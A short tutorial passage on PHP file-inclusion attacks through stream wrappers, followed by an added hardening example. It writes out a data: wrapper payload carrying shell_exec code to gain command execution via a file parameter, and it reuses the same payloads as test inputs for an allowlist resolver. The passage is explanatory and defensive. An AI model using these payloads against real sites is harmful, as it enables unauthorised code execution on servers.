PHP Wrappers

Instead of a URL/path to a file, we can try to include a PHP wrapper such as data:, like so:

http://10.11.0.22/menu.php?file=data:text/plain,hello world

Here's how we can obtain command execution using this method:

<vuln_url>/<vuln_path>?<vuln_param>=data:text/plain,<?php echo shell_exec("dir") ?>

e.g.:

http://10.10.0.2/menu.php?file=data:text/plain,<?php echo shell_exec("dir") ?>
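
On the defending side, the requests above only work when the file parameter reaches include unchanged and allow_url_include is enabled (it is Off by default, and PHP refuses data: in include while it is off). The following is an added example, not code from the original page: a hardened lookup for a script like menu.php, whose source the page does not show. The PAGES allowlist and resolve_page() are hypothetical names, and the sample inputs are constructed from the URLs above.

```php
<?php
// Hypothetical allowlist: request value => file shipped with the application.
const PAGES = [
    'home'    => 'pages/home.php',
    'contact' => 'pages/contact.php',
];

// Returns the relative path to include, or null when the value is rejected.
function resolve_page(string $requested): ?string
{
    // A leading "scheme:" means a stream wrapper (data:, php://, http://, ...).
    // The allowlist below would reject it anyway; matching it here lets the
    // attempt be logged as an indicator. rawurlencode keeps the log line intact.
    if (preg_match('/^[a-z][a-z0-9+.\-]*:/i', $requested) === 1) {
        error_log('wrapper scheme in file parameter: '
            . rawurlencode(substr($requested, 0, 80)));
        return null;
    }
    // Only exact allowlist keys map to a file; user input never becomes a path.
    return PAGES[$requested] ?? null;
}

if (PHP_SAPI === 'cli') {
    // Constructed sample inputs; the two data: values are the ones shown above.
    $samples = [
        'home',
        'data:text/plain,hello world',
        'data:text/plain,<?php echo shell_exec("dir") ?>',
        'unknown-page',
    ];
    foreach ($samples as $s) {
        printf("%-50s => %s\n", $s, resolve_page($s) ?? 'REJECTED');
    }
} else {
    // Web request: file[]=x arrives as an array, so accept strings only.
    $raw  = $_GET['file'] ?? 'home';
    $page = is_string($raw) ? resolve_page($raw) : null;
    if ($page === null) {
        http_response_code(404);
        exit;
    }
    include __DIR__ . '/' . $page;
}
```

Run from the command line, only 'home' resolves to a path; both data: values and the unknown key are rejected, and the wrapper attempts are written to the error log.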